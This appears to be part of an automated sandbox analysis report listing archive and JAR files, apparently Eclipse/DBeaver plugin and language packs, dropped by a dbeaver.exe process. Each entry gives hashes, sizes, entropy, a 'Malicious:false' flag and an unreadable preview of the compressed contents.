      Preview:PK........k.cX................plugin_fr.properties.WMs.6...W`........CF..m..V..d&..+...0.@..}. .)Jb..l.....]`..-uu@Q.,..X..eZY..g5.?..`;k..on6|.2.L..@...I*.......kWU.-...........^..q.L....o8~.\......[!- ..P."(~p...*2....E.?d....8i..0 .P....90....EB..6.H.p..?..}.5v.....E..6.r../.{...E....uf.V.t%...r...._..F...u1.>.uC...)..ZZQ..........|.._-$.^X.n5..[...?..g..z.F..|.......;.="".....6.%%v~.W...../~2'.P...!MQ...Ll.et4E......c..I.(.?Af.}..^D_..XUS....:/.|..K..j.2...y......#.L.d...d...3c....-T..&......:s%({m.A2c..%?.........!...c....).'}.T......0....x.....Y,&..2.:......]....;..y-Wv.k......%...[..T..zl/..B.....G..I.P.\..60.t.jE[....N.....i...R.Z...ra.C1,./.;..%BU.o.:.....:...lt...^.....q.L..,...].Q...w..I.*.......;....]64.0..5...rh5.s^...tl.5.&V.[(4...}4=}..{.m.H0..G....{E.8,..h..GJ..........}q....0.].......J.*..v.w.. .7D.g..B.|h..nC$..h...a.b.x/T..H....#.0...Jrud...!>...Z..^..e%X..>...z....>...........f.A..A.....}3.~.PK..=.T.........PK........k.c
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):475188
      Entropy (8bit):7.893908975970298
      Encrypted:false
      SSDEEP:
      MD5:7C4C80F2D421BE72F1F4C721F51B82FD
      SHA1:AAAB8E702606226D2F229C30FB1CD61A0A2521ED
      SHA-256:C547D8DBB8F756AE07890E718471DD499F99A02F90C56080B0996B0836F90DDA
      SHA-512:82C391D6F63010245B88EC30AB9481A80C8CC888CCEF76FD057783C8FF891FF5F45786A9E55A68F4A54CC54605795933AEED27D73E1FCCEB26786E848FC89892
      Malicious:false
      Reputation:unknown
      Preview:PK........k06W................META-INF/MANIFEST.MF..Y..H.6x.f......[....l.$....4.m. .o.~...Y.T..P.fsQY..9.~..9.Y.."......6-........oL..]..NO.....a....t... _.o.}......w...e...Y.d....g~{$..O.........>N.._..E.r..R...e....,...K......G..q.v....5....A.@...0.#...~.a...5........I..l.7.._....5.y.2.....;O?,..^....... l~.X.n.........*..w..on...\...................n}...'...4..>}../.\.e....^...._..<.U.4...eH.{..-,O......ew........ia.M.../.|.~._....<....,..?.../...~...]......L.?....o..}o4.~.....Io..4.........d...:..P._..E..f....\......_....).'..........^.&....?.....\?|c..v.%*....,O.>l.T.d..C].]...._.]..`.G,.?z....~}......w9..>..M.4K..I....@.&..2~.........,.......\...EoP}W.p......&~].........L.We...............l..oC~._/.....0A.......+N..%]W............y~.2.{9...a.:....Pv........:-..*......O.......4.....2S.v|...% .B....0..h...I"X..^.. ..J.........#..Y.D}..AW...._.*....w...g.x........n .C(T.[.u.....F>..5....O.....'.FNw;..k.i.j..>:
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):20391
      Entropy (8bit):7.815548825559235
      Encrypted:false
      SSDEEP:
      MD5:117AA7ADE841D33FDF5F4D25FFC16999
      SHA1:EAC037E42BB24269F5DA13CF69A780ACE7C1129C
      SHA-256:81578859E1AC1A4DCEB415964E37A09684C6659D16CA2AC6862CA70A13B75D56
      SHA-512:4DBA2E73AA1E13E59650DE7C3B702B8ABF2520C778477C9FF7965763F641B4F4BE262F0C4EBBF398537195AAFD23034FF99D46F1B974EF9501F3B9972AACD0C0
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_de.properties..1..0...S|...f.1...Rg..R.4..w....._m.$.8pP...I<]......W.."..."....3K....y].j"KX%ev,../...PK......c...h...PK........k.cX............2...org/eclipse/swt/internal/SWTMessages_de.properties.XQo...~. .^Z.urEq....,.I..Zv............\)Vq....+...$Z.3...g...G1.....:..E..y..5.......O$..6Wo.d*...Fo<]ZW.....q.O..W..s+.M.O....,s....S...uSR.N2.\...t.....9Cm.[r...~..u$.G..V.j.iH^...MM.....{.3mDO.XH..<hk$.V<JZ.....}..-5..I.w.N'..Gr..N.I..6..[.d..{ SP.......t ..b.t...{.......g.-:.,...|...:K.$.......S9..=..5..Wa...F..V.G. 2.g..Nh.5.:.8.4.9.....?...aWw}k.-g&......s....g..IK..OcS`..`.3....9!......)#..~>..m...E.o^.....<]...M...V.]..W.S........p..)0".'..N.....8.[.........(px..v.JK.i.x3f.VM...^.8zM.........$...>X`..?..uw.h.B#9u.....'...x.I..)...........s.BOF...UmT..2w....>#..-Hv.H............a...E...4I..N...D...%)...7)..|..'.a..e.'..>&h...D...^3........n=....$.c.3|O.0...G.......H(.']..h.gU.........n......!
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):2074371
      Entropy (8bit):7.963009384264104
      Encrypted:false
      SSDEEP:
      MD5:A692977BB25D7AB2EC5063776D4BB0AA
      SHA1:6A9AEBF386CE8F2E993908B5385D693B416AB2AF
      SHA-256:4045CB0A0A875BED5BF08E5554367A26521BDFC19733427EA30E68824FAA6C6B
      SHA-512:8E6DE099C1430068232FFF7D694E0EBADD07810956FABF7C19B82DCB0F23C90ACD206F0F6F1BC2C2511034020EB3926AD27E6134840C2C366A826177EA6A7E13
      Malicious:false
      Reputation:unknown
      Preview:PK........p.cX................META-INF/MANIFEST.MF.....T[k.0.~7.?..F..b...~h..:..,.}..%...-#....8v.6n6FH.|.>..s...+n......Q.....9......-...J..p."<...\WB2.3{..%.....&Y....R..H..s*Ei86[;O..I.o....g........W..2..........v...4DK.6.q.*....6.G..V.....&.&.sdD.In.....s.z4"GA.7.`..a..a4.w.....b..(J..M...t....+......$..=?.N(..THa./....7@.V[.u.O+cU~..&.Y.z.....;.\...H`"{U....C.{.R...#......t..~H..7T.....s..WZ@..8.....Jx'.X.. 5...E....>.7.t.-c.<E.LoA:..8...._.l..5..x..6mp..$v.t~#$.ct...)...5..?hmud.X..n........|..?,ctHk.o..z...O...Wa~..P..v.'.Y.RU...|.5/`.bdh.g..kkK.....]...|..e{ep..=...k.K..:.`..Kb...73<)..:}..,.n.w.,..9h..e.xJg3.E.`E.iJ..L.%....a..4.3.J......PK..7.z.......PK........p.cX................META-INF/..PK..............PK........p.cX................org/..PK..............PK........p.cX................org/eclipse/..PK..............PK........p.cX................org/eclipse/swt/..PK..............PK........p.cX................org/eclipse/swt/browser/..PK.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19241
      Entropy (8bit):7.937930894284111
      Encrypted:false
      SSDEEP:
      MD5:1537AB0BB228918AF23518C1AE1E3FA0
      SHA1:1B554900CF912CC34469EA66DFC2B3CA51C02A31
      SHA-256:23CA7F6C0ABD7B5E59A336B926B55805C5B28BC5CB8E4B95B0B9A4C2589B6744
      SHA-512:762F4E379A57C4214A2FB45A8950D168FEC0A010B4E09CDB277F33BDC2B355FC17936512836072E8756E8B89F40009B2FF600281D8BB0A50AC711ADCAE08B4A8
      Malicious:false
      Reputation:unknown
      Preview:PK..........mW................META-INF/MANIFEST.MF}.]s.<....;0..U..|-..t....n.v..tB. .H...~.'V.n.....9?.+>.I....1...f..f...@b._U.....aBJ..10.f. )..h...C.6..r.b..d..~...I.{9*.8G..4NK.0.K..,.)..x.c..0....cM.<N.T9N$/....i....1J.cuM...f..?z..b...Q.........>.fcZ. #....R_...q=5.@.. !I.........?...fC;8|..r.......f_.$....7V...f.9`..u.(R.1.A:...'j......R.......`.....=0....).a?../..-.w$.Z.Z.......b?..H'iCP..........S...gk.m..~+....bX...K.i....... p..8....3.....s.....-8..8...jOlM.....)...m.....i.>.t...Q.3.K....L...LZ.G...%..X.x..N.4R.N.5V....o...K..&......u#.0.[..Q.....T...}...tt.n.f..y.l.7.n.......m..O3._..fV.-....'.._l.oS.AY.,....'',..2....:q.......0....|..]...f.w~I.J.9.`.9_./..5._.<...w...".Z/.].Y&......e{P.M_.GO.....W7..../..c.Ku.u.l5..?..G............k... ....9....kz.6.#/......`.{.<..<......?No..'....,s...x...V....PK.....3)... ...PK..........mW................META-INF/ECLIPSE_.SFu.K..@......L....d. .@...>pc@........o2+.fv'.&..\..yHY.....,..7.&....!.1
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):28585
      Entropy (8bit):7.8896179994311995
      Encrypted:false
      SSDEEP:
      MD5:BDEDBAE744DA0C1F7CE4D8ED8AD4BD3A
      SHA1:B07D43EAEF16052CA942807138043C3DF776231B
      SHA-256:016C360FEFC144CB3F830A84AE6B63484BAAF43D7D740882FE49B08F43B2B5C5
      SHA-512:3F276723922BCB72A6388C2DB9EB634B6DFF722854E9AED6BD4B51660000042B0999B162AC21C91DF0C6DF84217CE92EF68739C32A7882E251BEC3F2B485E01F
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_pt_BR.propertiese..j.0...z.A.IJ.......@SBbz.e-o..Y.......e.@{1...hv. ..:..)..-.N*..u......Q.Bp..i....*....q3...F.Oh.X...Q..#.(.0..O...c...9..{..km....=6...QP.UjG...............|.,.J....*.0.T...Cd...X..nzn..g3|.X+.....e.....}.L=..<.]....c.....bMlQeo...r..&..#D..R^..P.j.T.c...!..C...X.....b..}.E.L....[..M.O.hk..6.....N.@Q@..PK..7q..B.......PK........j.cX............8...org/eclipse/team/internal/core/messages_pt_BR.properties.X]o.F.}. ..i..b9.n.-.......@r....y%MLr...r......)R.d....$.f..>...G4Q.N...F.]..b.%..Z.+...Od........K..lHI&KCC....!.>.p#.v.[...]|.m.e06..]...T..!3J.."...(...W.n.>..[........L.tX...D:-.]<..Ua"....V.......7*.S..(#i+-.g.W...4..........G.....4.Q.....G..2%....H.r|..B.$-VZ.R....b1..X$T......'..*r..OT..w.....Ja..-...\)...;.R.Iw<.BG..K......B.....5.N-...h-.%.7.Q...=.v?i.V0.).L.....J'd..q..x..._.r....:..A8... ...in....P'.o..h.F.U...V..?.^..g7/..5..?..x.F....yU.q..#..x.FP..&.*..TQJ......NA.C..q..[OJ
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):414871
      Entropy (8bit):7.897035876989194
      Encrypted:false
      SSDEEP:
      MD5:F736D9F2F65D62D124F350B907FFBDE7
      SHA1:D48AB8AEF02DF9A28EF69A6038D9D6024C6CF2F1
      SHA-256:2BF693757B9FC0BFA20055CA0FDE7B648C0A3353465CBAEC02C615C15F61D8F3
      SHA-512:BE651D1AD35C56C8830FFA9202EE397453650F6AB6E824C2D7CA1829155DCB5F3B14720685E0FE4A71B0D44C95B29F7CD216BCD06E10C1C36955983DF0954035
      Malicious:false
      Reputation:unknown
      Preview:PK..........fW................META-INF/MANIFEST.MF.}I..J....?.k..x.=%4K....Yh.B..x.y.....A.U.U.$y.]U%..+.....=\.[.Q...n.K..?......jC...?.._...!..X.~......;....?.CZ...A.....g..*(.?.{..%...._..WS.qZ]..q.J..R...u...."m..{...w.n....U\.....................C0..?A............C.U...[<..}}.H{...(Up...5m}H..}..R.Ezr.'A...2.n.?5.........~..(z.........\.C.v.g..]=../.OZ^..<.._..[..|..Q......?.z..&..=.{....wz3Z.6.y.+..\."..N?...^.wV.+...O.JO.Kz...K..M.....4.....L/O..t].}|eH.|~..KC..;....G....#..N.\..d?..,...wz...~....'..O.3.....cu..n....]..'.E3...7{.t.....-..t.;.:uo...?.p?.m..|o...l..Z?...=...M..........|._\......>.z....?.-D.....fs.~..E.M]......~v.......O..m.....FF/..u._]..K....l..._&*`..?\..T..l.....Ct....yq......}.?.:.~.......=....4.F..mX.g..?:..+N....o......d........p..n/......|.....7n..._...y.....{7....s>...?.....}..L{!....a.. ....A8..$. >D.~..^.G.............O"\F.^.. .?l...~.T.Vq(..cX....n....&...B.?.4>....`.]0..m..j_Z;.....A....H.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):115996
      Entropy (8bit):7.977289682710015
      Encrypted:false
      SSDEEP:
      MD5:14605D64B97FD4765CC7F6859634D35E
      SHA1:3FCFD04C3AD9519FEEC73411F04475E6AD4ED8F8
      SHA-256:DCE5FC5F003BF5329AD18D9BD8D4550913EC5433BE2635530607CB5E47B98328
      SHA-512:E3B02559CDBD7AECCA46FE591F905EA598421B703E5961CA5A39B5D76D6D2A6AD6C62AA332FA0C1460257E24E2A159B9921612BBC7F603E9351520BD75F91D43
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_ko.properties.Xmo.F..._a`@...#.:K..E...&h......f[."......=..,;.^.}.l.H>$..G.0.*.}.n...'.4.Ox.7U.vMQ.?Oj)'.)...`..l&y........+..1...D......|..l.Is<.u'..?......s)..O9|..zF....X...>.$1...sNC...*O.]..]E.....o......%....R....0..m..9.VE.~...jR..4o@.-..A%.]......'.kt..58"x`6+6)..o.|B. .p...}D:...C....ZV2..W..*.......9.ws.-I|D..A. :..$b..M^TR|.u.........X...:p[..J.....a......\%...B.t#g....!..ZJ$..i9.=.p\....G(yA...%.w..H..f.p..._...`......D..5.......|6...h."k....8D?C...=.R...*L:..tt....)...AH.JH.\..$.M5.(....(.{.`h.P..Ujg.......[...Z.t..1........$....$#.&J.... ...O......c......*.T..3ja.v....{ $d........CYT......X.;..j...-.m..H.....e.s....s....4..JY...>:....2E).[+....q..G....E?0`...i...8......l...:....f.M.K....:.6B......Al.j..v.8z[SCGm...6.^p...r$..B......sFz....#.8.c.....B.2.Cv.....=OF.}o..bAe|......P...........+I.yg..G..WK...!..f...T..1...........49.m.B..}.....,..."n.X.cA]=.KA.)....;QN...)Y.B..1.#......B.......^..Lg>3.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1491491
      Entropy (8bit):7.916453864392778
      Encrypted:false
      SSDEEP:
      MD5:E4CC5F8B0960101B8B57AF1925D61EB8
      SHA1:E7F2A1898FF50CEE48638D34845CB3CB7CF208E4
      SHA-256:85CC539B32DAA0426337B09A141D8BCFDCD7CB432B4109FA567B0A2502C2D845
      SHA-512:2CBD497A3F00F4A2A546102D7759DA096FD12C2C667DF9D6AA46AA0825BC9279A81893112555D97CC7D71827BE051CBC0C6232049C9994A75D899FD25B861FFF
      Malicious:false
      Reputation:unknown
      Preview:PK........W.fW................META-INF/MANIFEST.MF....J.6z...;......U...... .1....b....IL.=.A9TeU%Je..o.RB.N....cH^.......&)........."..k.......H^... ....Q..........tI....?.*.....0...^......K..G.......N...W.1..,...Q..(............I.8....i........o.j...W ..+.O..W..H.m.{mY.3@R.Q]x.4.7c....'".R..;.OU.}.F.O.e.e..k...^n.....?U/8y.{..f......d..................[......SnW.._x.R^p.mzRso....43R.xY.?>......1i.....3=../..0.~..{U5.......}.BU...:*........^..P...Q<M..........j."8.e.\..C.h..,.2....h/..w..F..>.Yymp|o..IOw.a.../. ....o;..L.%...'..N.....v{..I/3....E....?....2o..$9..?...Yn..................QSf.m..........4zP.......].>.7.}..+.$.....A.O7>I...N.x.Ft.I.....M.....A.W..c@..2=.....:.`:~%.[..I<...I.gnM.^p..y.;cFa2q...h.e.a..M........z................Wt.'.?.Q......{:.....][..s.?.2..w......S.bQ.h..?. .W...:.m..k...>v.m./O.......7z...o...=.....y.l.<....*......O...MO.!"l.............5.#.....B=...... \.~.>.X.B.........+..'.^E.K.o...I.....3?..WM.}....L
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):27082
      Entropy (8bit):7.304539490483281
      Encrypted:false
      SSDEEP:
      MD5:BD3424DDD253692F96301E04473CEA26
      SHA1:7F69442F01941AB64D5D13CF1E0C5DF75C310FA4
      SHA-256:253876B678E12D253D789AFE27CA4ABE32B60D25EC41A1B653FE12257339092C
      SHA-512:3449C6D6F81D70FEE43C3F591E6480A7D7734CD962A049D40292C949A999169D5095F4EE27CDBA256CE21DA7EB2DA340B77A8E3F0554D8C42F4EE51CD22AE978
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ru.properties..;.. ....S4q.E]4N.....H.......p.....x..<1p.X9.C!..6!P!...gS.!f-...R............._.PK..#..k\...i...PK........k.cX............=...org/eclipse/text/templates/TextTemplateMessages_ru.properties.R.j.0...+Lvw..Y.N..1.eP.XI.N.l....}....n.^.B.....H^.X.<........*1{c.3q....t.s..h..V..jl.?..0i......a..K.<i..T..`%. ..X..E.& .X...A....XNU....b.q..a(kR...H...@...;.].Xk,..sj..G. .....I.U&r.!;j,..7.x.#.N.Y...Z.....A.F........0F...Z%...........("..F.,*..6w.$....j...h.~{..9v...v.l.`.u\;...PK....i<....d...PK........k.cX............-...org/eclipse/text/edits/Messages_ru.properties.X.n.0.}.W ..p...i..&.{..._....8...Kl#.@...Y7./..k..s......(........#k.^!Z%.|....{=..V.{.X.YN.OESw=.BV..;..>.Z.2k+J.F.5...7.[.~..z....G..P...?..G..".9.... .G.*.....q.&.L...8.0..x..L.x..[...y..n.9L...$.0...X'........]..H..PqO...n+..r"..mk..._..Y...:.....pjH.Oi..A...1.}.,.APt...!W..,.i.$...#....E7...*6. ....dE.bx;v..]..9Gm[.hy.(..1<....#.uY..V..~y
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):9495
      Entropy (8bit):7.329465393593625
      Encrypted:false
      SSDEEP:
      MD5:1FF3C4A3D81701C49C8357AAAD030C3E
      SHA1:AEDDF338E9EC6A093F77951A0D4067C5020D2925
      SHA-256:8ABA4CB8597D2A6A7B41A80618A2C94C150E6A9C89003C75585BAE85C696DFB7
      SHA-512:CFC91D11F07F467343E55F651C805C5A39DD51F9D741C5FF71EB6AAA33F0E5195A2F54DA814D6E271D6064635F838C0D414D66C3B05142E27976881EF7873C90
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_zh.propertiesu...0...W..J....C... .Y..5..IL...{..t.|.^.\...VC"b"#......&..D.2..OU%..CA..#P.T.y.J.;..c..A0l.u..%..i..<........r-.K.}P.....d%..`.':.."..../PK..e':.........PK........j.cX............?...org/eclipse/text/quicksearch/internal/ui/messages_zh.propertiesu..N. .F.>.......R.+]..8.m2...+4........7.r..|.%z......z.fC...:..<..CXo.Jp....W.;.Tu...|9.wr~.|.._...#..#.0.......L...PJ.>-P..C.]...1...4.{.B../=)1+....0.P..?...2.H...Fe..r..tok9..L...,.I.........RK.E..g#..9.....0....6.......PK..~.-.........PK........j.cX................plugin_es.propertiesu.1o.@.....K.:^...2.f.....&q{....j.=$0....>.....I........i. ...jRt.J..Y^..GO.Q......mr...O<S.=...z..#.y...=6JX..T].-..m...T..E}(.M.......q........CM.......'0.5.J@.H3..e]...>B U..h.2=*.n.....a.#z.PK...~......X...PK........j.cX............?...org/eclipse/text/quicksearch/internal/ui/messages_es.properties.V]o.;.}....*.Bi.O.h.Z.CPZJ.G.h.;......Q..3c..lC..x...3g..xm.S
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):100583
      Entropy (8bit):7.878455946222125
      Encrypted:false
      SSDEEP:
      MD5:FFFEC996B6981095D459A1E6D9BB3094
      SHA1:2FF0F60BED4F7AD48EFAEE2D0A2A4776ABC19567
      SHA-256:144B022C4708C59C92AEFFBCF77694437B6349169F9EF4AECDEF4035B2CFB115
      SHA-512:154478BB3D2B78202DAA0EEDF7F6F81FB8B342691C130BEF6A47C78C8B6AB0E3FC6F726CFDAB133B2D4DAA35CB24DFC374B99AAE9159812F0C81DC79CDCEC2BC
      Malicious:false
      Reputation:unknown
      Preview:PK.........6.V................META-INF/MANIFEST.MF.ZY..J.~.....=...M....PD.Q.T`.&X.EV!Q...jUuu..Z...<.|y..(.I....o@^.i.p.u._F90!p..;.<...m?8....R...2..{......Y...q"p/=.|f.?/...<..#.J/H.?.W.Sl.Q`_w....v.d..BP.....f..G.$^.`..'.._,^....(.=.(N.}...P.......i~[N7H ..3.Awy~.\.3../w...~Y..$..W.s,...U.......].#.._...E......3...."-s.....F}......j8.BE.P]..*kd.7.&...D.F.h.W.......T....^?!."l.g.W..7.......t.$..43..A.L..h.c]....~...K5{..7Q....y..I.q...k...<Mb...;.<....E.m@....Y......,..(./................._.}6.....w.Q.Z.....'.f&.c.6n.....oc.... 9{.G1.A.....q.Qg...[C.pjg...U|...O....]..N....D..........Q&0...g.%....-..a....K...i..W..l...bsYu..%.i.6.^..4..~aJ.6....R..........+..z........>..f...4.~i5.Gv.YdB7../.DW.O....!.qv..1] ..|..M.gs.;.W..Q..Ff.@....6NS..;.~.GR..p...cS}.L...f.!.~.....Op..@.@......sH!..Z ..........E...)s...=.x.{=.l..M....J..fG........u.y...B..p]3H....s.y.Kg..&.z.../.<.T..k'...TE.o=i. /..+.e..g.).b.....\8.%<..j....ho%.Z.t.|
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):306314
      Entropy (8bit):7.904365876573691
      Encrypted:false
      SSDEEP:
      MD5:6C069B63D2BE73FFE64888D123D64044
      SHA1:E036916FD95FA3AA146C7056CEB6FE34171F3F05
      SHA-256:89AFA204E8E686EAA5F1464A6CEB65AC1B341AD1D0326CAB6716C6733ECAF5AC
      SHA-512:E46EB450A3070D3E02C99D01CEA9CA915DCDACDE2423BFB1ED8790CF0232F5C23AE3E0450193478ACABADC93268F8598D2BF4C6AE64437974AD0305664FFAAE6
      Malicious:false
      Reputation:unknown
      Preview:PK...........W................META-INF/MANIFEST.MF.......|.".=LL.....n....$.F............~K.f...*z...Q-...4O>./.S$a.v...i....7...........n..7....7...d...O....>.......U....x~V.Y.Q.r.o...}%9y..o._..QR<.|.F.r...../.&..xYR.....w.~...'....?.0.# .B.!.A..a..SVS...4?H;...%.....p../.^.M.Qq....m.i.x.............?..N.;].L..........Z..S.........~..1.4.....m.7^.....p.......@.wZ....t.......g...cW..U..O....M.q...y...h..~...6....A>a...A?.......}....Ey...,...+.#.rq..a.....*.X......].uI..v)..~._4..Z..=...3.4e..E..o.38...itT..C...b...l.g.b>....h..m6...z..Q...w]......q.>...r........c&.o...O}..q..*.......[.....?....;.....;....ynK......`P@.[.t...........G=.....\.~.....6.C.^T.x..x....J..s./f.:U...s......i.*.q.G..?.I..Y...S..7n...0..U....c.0p.....P}z........^...K...........f.....X.........~..q........R.x...4Fl....y.PJ.&..+.iy`V....`..h'k^JB..Gj.V...'A.O../..6.%qH.1+^..<...j...K.:..M`..{..9u.G.}q.....y./.... ...^..m.` .Vt.X..G.?y.t.n..........Y.h]..3..8h>......!.R..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):18352
      Entropy (8bit):7.774436291320204
      Encrypted:false
      SSDEEP:
      MD5:61494DA7A4E7222F6A15C0F093E99ECF
      SHA1:B9DC5C80F1A3256A1480CFA6B09E13F79E8D9C71
      SHA-256:49D8C401BC502EA2AA42A917981BF10B17C0A552C1C65A69006A29F1136568AE
      SHA-512:6E9EEDC4D430963E2FD78BE6BE01A4075355AA39026699714D942E3ABABF158BB57B704EBD64627B7DF30CB8299846B59D24AB00B7F8224AF2A4B1D50C940A57
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX............6...org/eclipse/ui/internal/browser/Messages_ja.properties.XKo.6...W.[...M..(1..t7...iPdS..`AIT"D..I.....rf$S.-[N/=.B.29.o....'.|+...j....D.6.T^.i..TQ.2...?T....4...Nd...R....t..P/.,n.k..J.L..V~<..\.O.VA.F.k..V.a............{N.....<W.Y.....,....b.P.M..j)...(.w..)"..j.Qw..q.pqgb..N....w2..{x.....as.{.>.c.Y.....(..*].Py..B.%.af.V...7i.>.9.W....Bz\.k.^.(.mv.....7.u.XK2y.."|..&..>...2 .xO..S.3.W......4.W.....)....J....Ch.;..)....8..B._...'.r..Ci.b....d2..&.F..DZW.I....H..G..@J.G....2..b........u)...b....d..Gd...`.DT.*7G~S../?...4..%.?o.P.......b.K.G.=Bi9.A..e..3...R....Q.(.M.:v..n..hkK.J.s.n..]W..).l.7..,...9.oi..I!....K4...n...n%FX.*.."..1..x#...l) .@.-%q*2u.#K.*"y)3Y....>g..p.P..%.Du...I.#l....b..e)..C..z.[..`..dzm.X.......4..4.....kU|_$.N5P.o...6 5..m....4"?..H....{.&...$.....z......e....d!.H.E...].2*.%@xa.]7.n.. Cy.A.>.$.~...."..s.../...%[',']....}*i.....<l.Y..M... 2....'7......ic..Fc.L.-.-#...}.2#S.....oU..jz.4B$=..;.....[.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):215306
      Entropy (8bit):7.883602502027097
      Encrypted:false
      SSDEEP:
      MD5:203DD0DF2E2A064728FB5E7F7EE16B84
      SHA1:7C54D541046FF2AB48CA5CDB27AF9426E9A8A586
      SHA-256:20C5CAFD839412CB76762B9AF3EF36943118E3D40831A91EF12180EBEE4585B2
      SHA-512:31035174ED8FC536BDA23EF613B92555368C92FBEE0976D01C55629DA2128910C2AC8A4C1939D717136B60DFE25A27C0B8A5A842644F0D91E250B6FB77AABD98
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.{Y....{G..pt..p..b... F..B $... .Y.....VQm.w...2.......T;...i........;.....u...g...T...wt.Fq....'.....S...K..J.?#...^.W?..uI..O[;.?..?Z.q.......a."..O..u..i\6.S.?9u14~...&...o.U.h.....B.VO0.=........!...G.m..mQ....s;.B...........r.y./..u.._o_.......~....w+..}..nb....._0...._...xf....o.n?.................>...~{..Oj_`o^..3.-.......U....Oj.V.nQ.Ou..q...|.c.ik.....O.......=A.....w|.......]......+}...4{.o_w.3..w...y;....".....nc...{...>.....l....4....E6?w...}u..M`6.O.....v}.....]...q..a.~..l>...w.9..2..B...n..~~.-..........F...Ii..:........I..i^........L-.[..#@0.. .Y.+.YQ....`>.>..)........'.c....K..&....=s5..T...D.=....8.M..;.|2.#.Ac.."..<..q.W...~\Q........?..1..E.`.._...,...M3{`.._.......~.o.r'.V%.p...:I.....8.j...M....?...-K.W..-!.+.....(U..n*..!,m:K.....=..|.....r.f..y....1.*vA+......5B......m....P.E.b....3.r^<..g..r..E....a......F..v.2u-.;..jq....R~.(...}.. .N..QK...3.[
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19715
      Entropy (8bit):7.52843628669745
      Encrypted:false
      SSDEEP:
      MD5:DE5080C2ED940FCAAE68108340AF10BE
      SHA1:F9328C63F67974912ECD16E320DB69A6AA6A1990
      SHA-256:594DD0BF34A7769EAE97F4998A5734233279C66BDB0CFE57AEB7F303AD961A15
      SHA-512:FCF6797BE92993219546AEAE93ABD3E662EC4DD622B1202D7CEBE78CCC4FBD34D4BDB39593B322808DCB182283949B45FF5195C2D7FB1F3083DF3186E8CF757B
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_pt_BR.properties...J.0....>E.{we.A.*... {.2Mf.6.&.j}z.X..+x.!3..d...(T7j..t.Gc.P.+K.5..4..f....@.R.X...U......Sg....b..(...6....<...a............S..'..e.......%K..fv..D.)s..&.g.G.i.1G.1L..m$...'.d. ..w5.l.6:..h.....o.....b.-}.......-fmH..;....K..g.....J...|.PK.../!z........PK........k.cX............@...org/eclipse/ui/internal/console/ConsoleMessages_pt_BR.properties.Umk.0..._!...A....:..N...6l....l_.QY'd.m...;9v..m.....=..N......b.D..%..H;+......Q,.3Wgg)....)i*..-.z..r.2...Ha2..3..kQ. .%._.p.................v.lR...6.c.X.90$'...8..l...eN..<~...`E.9....L..&.9u....@......$>3.].X4...1S..#q..I.T.v4.M.n9.5.B..o....y........].q.).cY...Cv"5.f./..V.......9....N|.D.F..2.u.)..Br..(_..J..A3l..m0..~....:A..7~U%.e5.K..sX..i&..w..<..:......p.J........?..L.N.O.J..2....c.......I......;..t.x..T.....\.9..m...<7....(:N}G....|3...3...9..I)z..4h9..z....r7....&..Y..Y.L<.+wopo.W...#..D...]..5f.8.....oW....$.6..Rc.2+....;4.f...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):252742
      Entropy (8bit):7.888941507835273
      Encrypted:false
      SSDEEP:
      MD5:D20248D686241A671658A841AEE7AE3E
      SHA1:23D18C6F369B82847E4E5ECC14C931286608F459
      SHA-256:055052BAB988A8F9E525ECEBF3819878799AB2C8D603E0F2969E01D0A5E1F8A8
      SHA-512:B5E15855E2986ABDDE89FCB21B78977C175391900A29815B0A201CC51D9EF702E4BA0E27B4DDEEF74DC9EDC4477B8EE417456E88FD09B9B963637EAB8E36FBDB
      Malicious:false
      Reputation:unknown
